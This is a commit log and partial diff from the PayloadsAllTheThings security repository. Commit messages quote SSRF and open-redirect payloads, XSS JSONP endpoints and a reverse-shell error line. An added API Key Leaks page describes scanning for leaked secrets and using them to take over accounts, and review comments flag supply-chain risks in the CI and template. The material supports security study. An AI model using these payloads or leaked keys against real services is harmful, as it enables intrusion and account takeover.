2020-02-06 15:43:58 +01:00
Swissky
37cfa0826e Merge pull request #154 from antonioCoco/patch-1
Added fully interactive reverse shell for windows
2020-02-06 00:36:25 +01:00
antonioCoco
50a376337d Update Reverse Shell Cheatsheet.md 2020-02-05 23:29:43 +01:00
Swissky
fb76fdc331 Windows Firewall + DLL hijacking + Named pipes 2020-02-01 22:12:36 +01:00
Swissky
8a19532f27 Merge pull request #152 from mcgyver5/master
Add Exploit for Telerik CVE-2017-9428
2020-01-29 00:06:57 +01:00
mcgyver5
667ae82aff fixing typo in file name 2020-01-28 17:41:01 +00:00
mcgyver5
bef710fccd add Telerik CVE attacks Telerik UI for ASP.NET ajax dialog handler 2020-01-28 17:33:30 +00:00
Tim
7d41cd750d Merge pull request #1 from swisskyrepo/master
Merge pull request #151 from mcgyver5/master
2020-01-28 12:26:20 -05:00
Swissky
3840683bed Merge pull request #151 from mcgyver5/master
add Telerik CVE-2019-18935
2020-01-27 20:13:28 +01:00
mcgyver5
44c68ca4e9 add Telerik CVE-2019-18935 2020-01-27 15:57:10 +00:00
Swissky
323a012488 Race Condition - First Draft 2020-01-26 12:43:59 +01:00
Swissky
eefa2afab1 Merge pull request #150 from austinsonger/master
Added CVE
2020-01-23 10:10:23 +01:00
Austin Songer
aacd095452 Added link to exploit creator 2020-01-22 17:49:47 +00:00
Austin Songer
b6e7ad655f Add Technology Affected 2020-01-22 17:49:03 +00:00
Austin Songer
d54fa1ef26 ADDED CVE: CVE-2019-19781 2020-01-22 17:47:38 +00:00
Swissky
be0397fa68 BloodHound ZIP + Zero Width space tip 2020-01-19 22:46:45 +01:00
Swissky
590b7681e4 Merge pull request #146 from mzfr/patch-1
Update TTY shell command for python
2020-01-17 17:11:46 +01:00
Swissky
7920b4a124 Merge pull request #149 from ksg97031/patch-1
Add escaped double or single quote cases
2020-01-17 10:36:34 +01:00
ksg
aabb48125f Add escaped double or single quote cases 2020-01-17 10:41:12 +09:00
Swissky
cfcf955a33 Merge pull request #148 from clirimemini/patch-1
Create 0xcela_event_handlers.txt
2020-01-15 18:13:41 +01:00
Çlirim Emini
d3ce3924a9 Create 0xcela_event_handlers.txt 2020-01-15 17:00:26 +01:00
Mehtab Zafar
8dc1e3c5fe Update TTY shell command for python
Made the command use python3 because most machines now have python3 installed.
2020-01-10 17:57:53 +05:30
Swissky
7ab6750655 Merge pull request #145 from ayomawdb/master
Change IP and port to a common value across commands
2020-01-09 12:44:19 +01:00
Ayoma Wijethunga
7f34c01794 Change IP and port to a common value across commands 2020-01-09 16:20:49 +05:30
Ayoma Wijethunga
96b9adb98b Change IP and port to a common value across commands 2020-01-09 16:17:35 +05:30
Swissky
742c7ee3c2 AppLocker rules 2020-01-06 23:03:54 +01:00
Swissky
71171fa78b SSRF exploiting WSGI 2020-01-05 22:11:28 +01:00
Swissky
3a9b9529cb Mimikatz - Credential Manager & DPAPI 2020-01-05 17:27:02 +01:00
Swissky
73abdeed71 Kerberos AD GPO 2020-01-05 16:28:00 +01:00
Swissky
b052f78d95 Blacklist3r and Machine Key 2020-01-02 23:33:04 +01:00
Swissky
97015e4f64 Merge pull request #143 from gdemarcsek/patch-1
Added another PHP reverse shell payload
2020-01-02 22:37:45 +01:00
György Demarcsek
9c188139ec Added PHP reverse shell
This reverse shell payload for PHP works even if `exec` is disabled and/or the new socket is not on fd 3
2020-01-02 19:27:35 +01:00
Swissky
0850839b25 Merge pull request #142 from mikesiegel/mike_ssrf
Added anti-SSRF header bypass for GCP
2020-01-01 12:44:41 +01:00
mikesiegel
e024afc9f7 Added anti-SSRF header bypass for GCP. 2019-12-31 15:11:58 +00:00
mikesiegel
7aa2761e3e Added anti-SSRF header bypass for GCP. A similar technique works on Azure and AWS, I'm guessing. 2019-12-31 15:07:20 +00:00
Swissky
0a6ac284c9 AdminSDHolder Abuse 2019-12-30 19:55:47 +01:00
Swissky
bcb24c9866 Abusing Active Directory ACLs/ACEs 2019-12-30 14:22:10 +01:00
Swissky
4b10c5e302 AD mitigations 2019-12-26 12:09:23 +01:00
Swissky
1535c5f1b3 Kubernetes - Privileged Service Account Token 2019-12-20 11:33:25 +01:00
Swissky
cf5a4b6e97 XSLT injection draft 2019-12-17 21:13:59 +01:00
Swissky
02f714d479 Merge pull request #139 from nizam0906/patch-5
Fixed Broken Links in Directory traversal
2019-12-17 19:19:35 +01:00
Swissky
ada158cd60 Merge pull request #138 from nizam0906/patch-4
Fixed Broken Links in Command Injection
2019-12-17 19:18:54 +01:00
Swissky
4c96a5a6ef Merge pull request #137 from nizam0906/patch-3
Updated Summary and Fixed Broken Links in CSRF
2019-12-17 19:18:34 +01:00
Swissky
976403034c Merge pull request #136 from nizam0906/patch-2
Added Summary in CRLF
2019-12-17 19:18:11 +01:00
nizam0906
6939499bed Fixed Broken Links in Directory traversal 2019-12-17 22:35:35 +05:30
nizam0906
4de5a20376 Fixed Broken Links in Command Injection 2019-12-17 22:29:17 +05:30
nizam0906
156ea32217 Updated Summary and Fixed Broken Links in CSRF 2019-12-17 22:21:53 +05:30
nizam0906
d6d649e08f Added Summary in CRLF 2019-12-17 22:12:35 +05:30
Swissky
4588cc2eee Merge pull request #135 from nizam0906/patch-1
Fixed Broken Links in API Key Leaks
2019-12-17 17:39:55 +01:00
nizam0906
03762911a7 Fixed Broken Links in API Key Leaks 2019-12-17 21:59:19 +05:30
Swissky
896e262531 Privilege impersonation and GraphQL SQLi 2019-12-11 16:59:14 +01:00
Swissky
ba9fce83b1 Merge pull request #131 from js-kyle/angularjs
clarify AngularJS vs Angular
2019-12-07 12:01:08 +01:00
Kyle Martin
e95b0c34a3 clarify AngularJS vs Angular 2019-12-07 10:54:47 +13:00
Swissky
6f4a28ef66 Slim RCE + CAP list 2019-12-05 23:06:53 +01:00
Swissky
21101ec287 Merge pull request #130 from clem9669/patch-3
Bypass XSS filters on alert
2019-12-03 15:40:22 +01:00
clem9669
286f7caaa3 Bypass XSS filters on alert
Bypass XSS filters using JavaScript global variables, based on the following article https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/ from theMiddle.
2019-12-03 15:24:24 +01:00
Swissky
e92126a16c Merge pull request #129 from noraj/patch-2
SSFR: add ref for docker
2019-12-02 22:38:28 +01:00
Swissky
ac0239d332 Merge pull request #128 from noraj/patch-1
XXE: add XXE via SVG rasterization
2019-12-02 22:38:08 +01:00
Swissky
c125b35f98 Merge pull request #127 from trietptm/master
Copy this -> Cut this
2019-12-02 10:52:19 +01:00
Minh Triet Pham Tran
f44d014fc2 Copy this -> Cut this
Change copy to cut instruction
2019-12-02 12:59:54 +07:00
Swissky
c60f264664 RDP backdoor + RDP session takeover 2019-11-26 23:39:14 +01:00
Swissky
06864b0ff8 Password spraying rewrite + Summary fix 2019-11-25 23:35:20 +01:00
Swissky
3abaa3e23d Linux AD - Keyring, Keytab, CCACHE 2019-11-25 23:12:06 +01:00
Swissky
886a0b9426 Merge pull request #125 from noraj/patch-3
Ruby: add slim
2019-11-16 23:49:11 +01:00
Alexandre ZANNI
6a398ca5c3 Ruby: add slim 2019-11-16 17:29:55 +01:00
Swissky
00684a10cd IIS asp shell with .asa, .cer, .xamlx 2019-11-16 14:53:42 +01:00
Swissky
639dc9faec .url file in writeable share 2019-11-14 23:54:57 +01:00
Swissky
3a384c34aa Password spray + AD summary re-org 2019-11-14 23:37:51 +01:00
Swissky
7f266bfda8 mitm ipv6 + macOS kerberoasting 2019-11-14 23:26:13 +01:00
Swissky
255a8c3660 Merge pull request #124 from yehgdotnet/patch-1
Added new payloads from hahwul.com
2019-11-14 14:21:31 +01:00
Myo Soe
eac33e7e10 Added new payloads
Added new payloads from https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html

http://google.com\www.whitelisteddomain.tld
http://google.com&www.whitelisteddomain.tld
http:///////////google.com
\\google.com
http://www.whitelisteddomain.tld.google.com
2019-11-14 18:26:35 +08:00
Swissky
6ca8aa8acc Merge pull request #123 from bash-c/patch-1
fix invalid link
2019-11-14 10:25:54 +01:00
M4x
221b353030 fix invalid link 2019-11-14 16:59:52 +08:00
Swissky
43f185d289 CVE-2019-1322 UsoSvc 2019-11-11 20:31:07 +01:00
Swissky
f6d5221a85 SID history break trust + Powershell history + SCF files 2019-11-07 23:21:00 +01:00
Swissky
6fecedd880 MXSS - Mutated XSS - Google POC 2019-11-06 18:32:29 +01:00
Swissky
24516ca7a1 Kubernetes attacks update + ref to securityboulevard 2019-11-05 11:05:59 +01:00
Swissky
60050219b7 Impersonating Office 365 Users on Azure AD Connect 2019-11-04 21:43:44 +01:00
Swissky
4eae23a43d Merge pull request #122 from noraj/patch-4
XXE: tools description + more tools
2019-11-04 09:11:26 +01:00
Swissky
adaa93b4b8 Merge pull request #121 from noraj/patch-3
add ref for docker SSRF
2019-11-04 09:10:46 +01:00
Alexandre ZANNI
e3604c01d7 XXE: tools description + more tools 2019-11-04 01:58:15 +01:00
Alexandre ZANNI
54c94e0398 add ref for docker SSRF 2019-11-03 23:50:58 +01:00
Alexandre ZANNI
64f8f4d869 add ref for docker SSRF 2019-11-03 23:49:36 +01:00
Swissky
3585b1f00f Merge pull request #120 from cydave/patch-1
Fix awk snippet
2019-11-03 17:54:52 +01:00
Dave
775d10c256 Fix awk snippet
A small typo in the awk one-liner prevents successful execution of the command.

```
awk: cmd. line:1: warning: remote host and port information (10.0.0.1>, 4242) invalid: Name or service not known
awk: cmd. line:1: fatal: can't open two way pipe `/inet/tcp/0/10.0.0.1>/4242' for input/output (No such file or directory)
```

This commit fixes this :)
2019-11-03 16:07:16 +00:00
Alexandre ZANNI
83f46a22e3 add XXE via SVG rasterization 2019-11-02 00:54:48 +01:00
Swissky
952b3c0369 Merge pull request #119 from Hi15358/master
Updated Insecure Deserialization/Java.md and Created Zip Slip in Upload Insecure Files
2019-10-30 09:05:22 +01:00
Hi15358
83569c6142 Update and rename ReadMe.txt to README.md 2019-10-30 12:07:50 +08:00
Hi15358
5fec4f7c21 Update Java.md 2019-10-30 11:36:09 +08:00
Hi15358
5f31044ae3 Create ReadMe.txt 2019-10-30 11:24:56 +08:00
Hi15358
bd121bfccb Delete Readme 2019-10-30 11:24:35 +08:00
Hi15358
b36e5262bd Create Readme 2019-10-30 11:19:52 +08:00
Hi15358
757e1c107e Merge pull request #2 from swisskyrepo/master
Update
2019-10-30 11:18:36 +08:00
Swissky
069463fe14 Merge pull request #117 from Reelix/patch-1
Added an alternate possible Found condition to POST
2019-10-29 21:06:35 +01:00
Swissky
535ad5baaa Merge pull request #118 from cydave/cydave-patch-1
Fix lua reverse shell quote issue
2019-10-29 21:06:07 +01:00
Dave
6b22d53257 Fix lua reverse shell quote issue
The single quotes around `io.popen` prevented the one-liner from being executed.
This change should fix that :)
2019-10-29 19:31:07 +00:00
Reelix
694e9e4dbd Added an alternate possible Found condition to POST 2019-10-29 21:11:56 +02:00
Swissky
55d1731897 Merge pull request #116 from nizam0906/master
Added More Updates in SQL Injection
2019-10-29 17:11:28 +01:00
nizam0906
d41e0d33bd Added Summary in Hibernate Query Language Injection 2019-10-29 19:47:42 +05:30
nizam0906
4d94e553b9 Added Summary in Cassandra Injection 2019-10-29 19:42:49 +05:30
nizam0906
fe8c7be2fb Fixed Broken Links in SQL injection README.md 2019-10-29 19:33:09 +05:30
nizam0906
a69c2acb7d Added Summary in SQLite Injection 2019-10-29 19:22:49 +05:30
nizam0906
4b1f7e629d Fixed Broken Links in PostgreSQL Injection 2019-10-29 19:06:41 +05:30
nizam0906
20d6599772 Added Summary 2019-10-29 18:57:33 +05:30
nizam0906
ca59b1d217 Fixed Broken Links in MSSQL Injection
2019-10-29 18:44:28 +05:30
nizam0906
a33dce0d60 Fixed Broken Links 2019-10-29 18:25:00 +05:30
nizam0906
7d6fab92fa Update Detect columns number
Using SELECT * FROM SOME_EXISTING_TABLE Error Based
2019-10-29 18:11:58 +05:30
nizam0906
614e8a97b9 Updated Detect columns number
Detect columns number using LIMIT INTO Error Based
2019-10-29 16:48:11 +05:30
nizam0906
f81f9440b8 Added More Ways to Detect columns number
using order by or group by
using order by or group by error based
using UNION SELECT Error Based
2019-10-29 16:32:22 +05:30
Swissky
b7fdf8aa3f Merge pull request #106 from Hi15358/master
Update Reverse Shell Cheatsheet.md and Directory Traversal
2019-10-29 10:14:07 +01:00
Hi15358
34d8853728 Merge pull request #1 from Hi15358/patch-1
Patch 1
2019-10-29 16:30:58 +08:00
Hi15358
bb7e6b7cd0 Update README.md 2019-10-29 16:23:39 +08:00
Swissky
377aad4061 Merge pull request #115 from nizam0906/master
Added List Database Administrator Accounts
2019-10-29 08:36:01 +01:00
Swissky
b25694239b Merge pull request #114 from noraj/patch-1
XXE: add XXEinjector
2019-10-29 08:35:31 +01:00
nizam0906
bb2c247160 Added List Database Administrator Accounts
SELECT datname FROM pg_database
2019-10-29 10:32:39 +05:30
Alexandre ZANNI
52119907f6 add XXEinjector 2019-10-29 00:41:04 +01:00
Swissky
5094ef8b10 XXE in XLSX 2019-10-28 20:46:19 +01:00
Swissky
534d46d0e4 Merge pull request #113 from Q5Ca/patch-1
Add bypass WAF no equal using BETWEEN
2019-10-28 18:21:26 +01:00
Swissky
be3ef08d19 Merge pull request #112 from nizam0906/master
Added More PostgreSQL Injection Queries And Blind XSS endpoint
2019-10-28 18:20:54 +01:00
duongdpt
135af74acd Update README.md
Add bypass waf using BETWEEN
2019-10-28 22:26:28 +07:00
nizam0906
ab341cff38 Updated Blind XSS endpoint
* User Agent
* Comment Box
2019-10-28 16:51:36 +05:30
nizam0906
3dcd4425a8 Added more PostgreSQL Injection Queries
* PostgreSQL version
* PostgreSQL Current User
* PostgreSQL List Users
* PostgreSQL List Password Hashes
* PostgreSQL List Privileges
* PostgreSQL database name
* PostgreSQL List databases
* PostgreSQL List tables
* PostgreSQL List columns
* PostgreSQL Stacked query
2019-10-28 16:26:49 +05:30
Swissky
56ec623412 Merge pull request #111 from noraj/patch-1
XPATH: add tools
2019-10-26 21:46:18 +02:00
Swissky
68f1a17b57 Merge pull request #110 from nizam0906/master
Update PostgreSQL Injection.md
2019-10-26 21:44:25 +02:00
Alexandre ZANNI
525429c0d8 XPATH: add tools 2019-10-26 16:43:36 +02:00
nizam0906
f35ace93cf Update PostgreSQL Injection.md
Updated PostgreSQL Error Based injections
2019-10-26 18:07:14 +05:30
Swissky
882eec0566 Merge pull request #109 from nizam0906/master
Added 3 yahoo jsonp endpoints
2019-10-26 11:39:57 +02:00
nizam0906
aef5bb864a Update jsonp_endpoint.txt
Added 3 yahoo jsonp endpoints
* https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)
* https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)
* https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-
2019-10-25 22:27:16 +05:30
Swissky
32c18fdf56 Merge pull request #108 from nizam0906/master
Added 6 MYSQL DIOS
2019-10-25 17:04:57 +02:00
nizam0906
5b59da70f7 Update MySQL Injection.md
Added 6 MYSQL DIOS
* Zen
* Zen WAF
* ~tr0jAn WAF
* ~tr0jAn Benchmark
* N1Z4M
* sharik
2019-10-25 18:11:11 +05:30
Swissky
88f020381d Out of band XPATH 2019-10-22 23:06:35 +02:00
Swissky
3464611c00 Merge pull request #107 from noraj/patch-1
fix TOC links
2019-10-22 21:41:28 +02:00
Alexandre ZANNI
c6b5bbab2b fix TOC links 2019-10-22 20:26:04 +02:00
Swissky
727eb5cabd Drop the MIC 2019-10-21 23:00:27 +02:00
Swissky
11fc6e4bc5 NTLM relay + MS08-068 2019-10-20 22:09:36 +02:00
Hi15358
b54142c3a2 Update Reverse Shell Cheatsheet.md 2019-10-21 02:35:13 +08:00
Swissky
ed252df92e krb5.keytab + credential use summary 2019-10-20 13:25:06 +02:00
Swissky
7159a3ded3 RODC dcsync note + Dumping AD Domain summary 2019-10-18 00:07:09 +02:00
Swissky
8eae039a28 netdoc:// wrapper for Java SSRF 2019-10-17 21:13:04 +02:00
Swissky
67a68d7eac Merge pull request #105 from Zeecka/patch-3
Add filter iconv utf16 LFI bypass tricks
2019-10-17 19:39:00 +02:00
Alex Zeecka
83caef8ee1 Add filter iconv utf16 LFI bypass tricks 2019-10-17 17:40:59 +02:00
Swissky
b22742ba9e Merge pull request #103 from Ali-Yazdani/patch-1
Update readme.md
2019-10-16 23:35:04 +02:00
Ali Yazdani
52d02cea63 Update readme.md
Add some related security tools.
2019-10-16 14:45:42 +02:00
Swissky
6a81a130cc Merge pull request #102 from op01/master
Update Silver Ticket
2019-10-15 19:17:03 +02:00
OOP
f0af3b4f4d Update Active Directory Attack.md 2019-10-15 23:18:07 +07:00
Swissky
05b3e13098 SSRF for ECS 2019-10-12 13:30:52 +02:00
Swissky
57628ffd18 Merge pull request #101 from Ali-Yazdani/patch-1
Add Kubernetes file
2019-10-11 14:36:54 +02:00
Ali Yazdani
03d02ccdd6 Create readme.md
Adding Kubernetes file
2019-10-11 12:56:22 +02:00
Swissky
320a9fad31 Merge pull request #100 from noraj/patch-1
little changes
2019-10-09 20:49:20 +02:00
Alexandre ZANNI
9f463d156b little changes
- fix exploits ToC anchor
- add nosqlilab
2019-10-09 16:53:34 +02:00
Swissky
357658371f SSRF URL for Google Cloud 2019-10-06 20:59:58 +02:00
Swissky
8b0bd4d655 Merge pull request #99 from marcan2020/patch-4
Add  Angular Automatic Sanitization
2019-10-03 16:14:06 +02:00
Swissky
54d6161c9d Merge pull request #98 from marcan2020/patch-3
Add .NET references
2019-10-03 16:13:25 +02:00
Swissky
cb9b7a1304 Merge pull request #97 from marcan2020/patch-2
Fix dead youtube link
2019-10-03 16:13:00 +02:00
marcan2020
920da73bd7 Add Angular automatic sanitization 2019-10-02 21:24:53 -04:00
marcan2020
4f38666c35 Add .NET references 2019-10-02 20:23:37 -04:00
marcan2020
e180d1f7e6 Fix dead youtube link 2019-10-02 20:09:41 -04:00
Swissky
e1e5397d4c Merge pull request #96 from h3xstream/master
Add local DTD section to the XXE Injection page
2019-10-02 20:41:37 +02:00
Philippe Arteau
f2beb0dbbc Add local DTD section to the XXE Injection page 2019-10-01 18:22:42 -04:00
Swissky
6a11a6c670 Merge pull request #94 from Luci-d/patch-1
Add Spyse to network discovery
2019-09-30 14:08:00 +02:00
Mark
3fb2a9006f Add Spyse to network discovery
1. spyse itself 
2. Python wrapper - uses only part of the available functionality of Spyse for now, but will be updated very soon.
2019-09-30 15:26:26 +04:00
Swissky
3221197b1e RCE vBulletin + findomain 2019-09-26 20:41:01 +02:00
Swissky
9a02958b51 API Key Leaks - Twitter/Twilio/Gitlab 2019-09-22 17:06:44 +02:00
Swissky
8061cdd856 Merge pull request #92 from Techbrunch/patch-2
Add XXE payload inside SVG
2019-09-18 08:12:37 +02:00
Techbrunch
8822199f65 Add XXE payload inside SVG
Source: https://portswigger.net/web-security/xxe/lab-xxe-via-file-upload
2019-09-17 16:23:14 +02:00
Swissky
a0917241ad Pebble - Server Side Template Injection 2019-09-17 15:43:13 +02:00
Swissky
e6f94af721 Update FUNDING.yml with buymeacoffee 2019-09-13 17:49:47 +02:00
Swissky
742e3204d3 SharpPersist - Windows Persistence 2019-09-13 17:38:23 +02:00
Swissky
5455c30ec7 Juicy Potato + XXE update 2019-09-08 19:44:51 +02:00
Swissky
2b1900e046 PrivEsc - sudoers + Upload PHP 2019-09-02 12:36:40 +02:00
Swissky
3ca07aeb7a Docker Privesc - Unix socket 2019-08-30 17:25:07 +02:00
Swissky
2a4c4f46b2 Merge pull request #88 from ricardojba/patch-1
Add Host/Split Unicode Normalization
2019-08-30 10:03:46 +02:00
Ricardo
0625e2aebf Add Host/Split Unicode Normalization
Add Host/Split Exploitable Antipatterns in Unicode Normalization BH 2019 for filter bypass
2019-08-30 08:57:22 +01:00
Swissky
c6824e7aa9 Merge pull request #86 from JLLeitschuh/patch-1
Add XSS dot filter bypass with decimal IP
2019-08-29 20:12:51 +02:00
Swissky
da3bdc5f61 Merge pull request #87 from noraj/patch-1
add missing backtick
2019-08-29 10:31:47 +02:00
Alexandre ZANNI
72c54b5c1b add missing backtick 2019-08-29 09:49:09 +02:00
Swissky
bb305d0183 Network Discovery - Masscan update 2019-08-29 01:08:26 +02:00
Jonathan Leitschuh
7b6c8d46aa Add dot filter bypass with decimal IP 2019-08-28 13:56:55 -04:00
Swissky
6c161f26b2 JWT None alternative + MS15-051 2019-08-22 23:03:48 +02:00
Swissky
e0220d1f17 Merge pull request #85 from TH3xACE/patch-1
Update Linux - Privilege Escalation.md
2019-08-19 08:11:50 +02:00
David B
3fd0791c2a Update Linux - Privilege Escalation.md
Adding a tool that helps with privilege escalation on Linux through sudo.
2019-08-19 00:55:30 +02:00
Swissky
8dffb59ac5 Pspy + Silver Ticket + MSSQL connect 2019-08-18 22:24:48 +02:00
Swissky
4a176615fe CORS Misconfiguration 2019-08-18 12:08:51 +02:00
Swissky
b6697d8595 SSRF SVG + Windows Token getsystem 2019-08-15 18:21:06 +02:00
Swissky
9a8b2fee8e Merge pull request #83 from noraj/patch-3
add XXE ftp tool
2019-08-06 18:06:38 +02:00
Alexandre ZANNI
66c9d945b7 Update README.md 2019-08-06 17:28:47 +02:00
Swissky
bd449e9cea XSS PostMessage 2019-08-03 23:22:14 +02:00
Swissky
9b96c7692f XSS onpointer* 2019-08-01 14:39:15 +02:00
Swissky
a331d87ffe Better sponsoring method 2019-07-27 13:13:10 +02:00
Swissky
6baa446144 Directory Traversal CVE 2018 Spring 2019-07-27 13:02:16 +02:00
Swissky
98124178db EoP - Juicy Potato 2019-07-26 15:29:34 +02:00
Swissky
657823a353 PTH Mitigation + Linux Smart Enumeration 2019-07-26 14:24:58 +02:00
Swissky
f6c0f226af PXE boot attack 2019-07-25 14:08:32 +02:00
Swissky
859695e2be Update PrivExchange based on chryzsh blog post 2019-07-24 14:10:58 +02:00
Swissky
a14b3af934 Active Directory - Resource Based Constrained Delegation 2019-07-22 21:45:50 +02:00
Swissky
0b9d76eb8e HQL references 2019-07-19 19:34:23 +02:00
Swissky
45af613fd9 Active Directory - Unconstrained delegation 2019-07-17 23:17:35 +02:00
Swissky
3cce80cd53 Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings 2019-07-14 14:24:00 +02:00
Swissky
382bd9acec Type Juggling - Another SHA 256 2019-07-14 14:23:20 +02:00
Swissky
ca331acba8 Merge pull request #79 from LewisArdern/patch-1
adding reference to blog
2019-07-13 00:11:10 +02:00
Lewis
dab064a583 adding reference to blog 2019-07-12 12:49:02 -07:00
Swissky
504caa3b50 SSTI by calling Popen without guessing the offset 2019-07-10 21:31:44 +02:00
Swissky
bdef021a6d Magic Hashes SHA224 and SHA256 2019-07-10 21:26:24 +02:00
Swissky
05054af343 JWT RS256 to HS256 using pubkey to generate a signature 2019-07-10 20:58:50 +02:00
Swissky
6cecb8fa7a GraphQL - Projection + Edges/Nodes 2019-07-05 21:34:04 +02:00
241 changed files with 22460 additions and 8210 deletions

4
.github/FUNDING.yml vendored Normal file

@@ -0,0 +1,4 @@
# These are supported funding model platforms
github: swisskyrepo
ko_fi: swissky
custom: https://www.buymeacoffee.com/swissky

.github/banner.png vendored Normal file (binary image, 810 KiB; not shown)

2527
.github/hopla_config.json vendored Normal file

File diff suppressed because it is too large

27
.github/overrides/main.html vendored Normal file

@@ -0,0 +1,27 @@
{% extends "base.html" %}
{% block content %}
{{ super() }}
<div class="social-container">
<b>Share this content</b>
<div class="a2a_kit a2a_kit_size_32 a2a_default_style">
<a class="a2a_dd" href="https://www.addtoany.com/share"></a>
<a class="a2a_button_x"></a>
<a class="a2a_button_telegram"></a>
<a class="a2a_button_linkedin"></a>
<a class="a2a_button_email"></a>
<a class="a2a_button_microsoft_teams"></a>
</div>
<br>
<script async src="https://static.addtoany.com/menu/page.js"></script>
</div>
{% endblock %}
{% block styles %}
{{ super() }}
<style>
.social-container {
float: right;
}
</style>
{% endblock %}
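Review bot: the `<script async src="https://static.addtoany.com/menu/page.js"></script>` added in the `content` block loads a third-party script into every generated page with no `integrity` attribute and nothing limiting what it may do, so whoever controls static.addtoany.com (or its CDN) can run arbitrary JavaScript in the context of the published site. For a site that republishes payload lists that is a cheap supply-chain hook; prefer self-hosting a pinned copy of the script so an `integrity` hash can be set, or, if the live script is required, pair it with a Content-Security-Policy that allows only this origin and record that trust decision next to the template. Minor: the share anchors (`<a class="a2a_dd" href="https://www.addtoany.com/share"></a>` and the `a2a_button_*` ones) have no text content, so they are empty links until the remote script runs.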

34
.github/workflows/ci.yml vendored Normal file

@@ -0,0 +1,34 @@
name: ci
on:
push:
branches:
- master
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
submodules: recursive
# Checks-out submodules
- uses: actions/checkout@v2
- name: Checkout submodules
shell: bash
run: |
git config --global user.email "no-reply@github.com"
git config --global user.name "Swk"
git config --global pull.rebase false
git submodule add https://github.com/swisskyrepo/PayloadsAllTheThings/ docs
mv docs/.github/overrides .
- uses: actions/setup-python@v2
with:
python-version: 3.x
- run: pip install mkdocs-material
- run: pip install mkdocs-git-revision-date-localized-plugin
- run: pip install mkdocs-git-committers-plugin
- run: pip install mkdocs-material[imaging]
- run: mkdocs gh-deploy --force
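Review bot: the second `- uses: actions/checkout@v2` step (the one without `with:`) re-checks out the repository and throws away the `submodules: recursive` checkout directly above it; one of the two should go. The `Checkout submodules` step then runs `git submodule add https://github.com/swisskyrepo/PayloadsAllTheThings/ docs`, which clones whatever is on that remote's default branch at build time rather than the commit that triggered the push, so the deployed site cannot be reproduced from the triggering commit and any content pushed to the remote is published on the next run; check out the triggering ref into `docs` instead, or pin a commit. The same pinning point applies to the build chain: `actions/checkout@v2`, `actions/setup-python@v2` and the four unversioned `pip install` lines all float on mutable tags, and `mkdocs gh-deploy --force` force-pushes `gh-pages` using the default workflow token, so pin the actions to commit SHAs, pin the mkdocs package versions, and add an explicit `permissions:` block granting `contents: write` and nothing else.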

3
.gitignore vendored

@@ -1,4 +1,3 @@
BuildPDF/ BuildPDF/
.vscode .vscode
.todo .todo
AWS Amazon Lambda/
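Review bot: dropping `AWS Amazon Lambda/` from `.gitignore` makes everything under that directory trackable from this commit on, but the change set does not say why. Since this same change adds an API Key Leaks page, confirm the directory holds only documentation and no deployment packages, `.env` files or AWS credentials before anything in it is committed, and state the intent (start tracking the directory) in the commit message.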

File diff suppressed because it is too large

241
API Key Leaks/README.md Normal file

@@ -0,0 +1,241 @@
# API Key Leaks
> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares.
## Summary
- [Tools](#tools)
- [Exploit](#exploit)
- [Google Maps](#google-maps)
- [Algolia](#algolia)
- [Slack API Token](#slack-api-token)
- [Facebook Access Token](#facebook-access-token)
- [Github client id and client secret](#github-client-id-and-client-secret)
- [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token)
- [Twitter API Secret](#twitter-api-secret)
- [Twitter Bearer Token](#twitter-bearer-token)
- [Gitlab Personal Access Token](#gitlab-personal-access-token)
- [HockeyApp API Token](#hockeyapp-api-token)
- [IIS Machine Keys](#iis-machine-keys)
- [Mapbox API Token](#Mapbox-API-Token)
## Tools
- [momenbasel/KeyFinder](https://github.com/momenbasel/KeyFinder) - is a tool that let you find keys while surfing the web
- [streaak/keyhacks](https://github.com/streaak/keyhacks) - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid
- [trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) - Find credentials all over the place
```ps1
## Scan a Github Organization
docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity
## Scan a GitHub Repository, its Issues and Pull Requests
docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys --issue-comments --pr-comments
## Scan a Docker image for verified secrets
docker run --rm -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest docker --image trufflesecurity/secrets
```
- [aquasecurity/trivy](https://github.com/aquasecurity/trivy) - General purpose vulnerability and misconfiguration scanner which also searches for API keys/secrets
- [projectdiscovery/nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) - Use these templates to test an API token against many API service endpoints
```powershell
nuclei -t token-spray/ -var token=token_list.txt
```
- [blacklanternsecurity/badsecrets](https://github.com/blacklanternsecurity/badsecrets) - A library for detecting known or weak secrets on across many platforms
```ps1
python examples/cli.py --url http://example.com/contains_bad_secret.html
python examples/cli.py eyJhbGciOiJIUzI1NiJ9.eyJJc3N1ZXIiOiJJc3N1ZXIiLCJVc2VybmFtZSI6IkJhZFNlY3JldHMiLCJleHAiOjE1OTMxMzM0ODMsImlhdCI6MTQ2NjkwMzA4M30.ovqRikAo_0kKJ0GVrAwQlezymxrLGjcEiW_s3UJMMCo
python ./badsecrets/examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE
python ./badsecrets/examples/telerik_knownkey.py --url http://vulnerablesite/Telerik.Web.UI.DialogHandler.aspx
python ./badsecrets/examples/symfony_knownkey.py --url https://localhost/
```
- [mazen160/secrets-patterns-db](https://github.com/mazen160/secrets-patterns-db) - Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more.
## Exploit
The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.
### Google Maps
Use : https://github.com/ozguralp/gmapsapiscanner/
| Name | Endpoint |
| --------------------- | --------- |
| Static Maps | https://maps.googleapis.com/maps/api/staticmap?center=45%2C10&zoom=7&size=400x400&key=KEY_HERE |
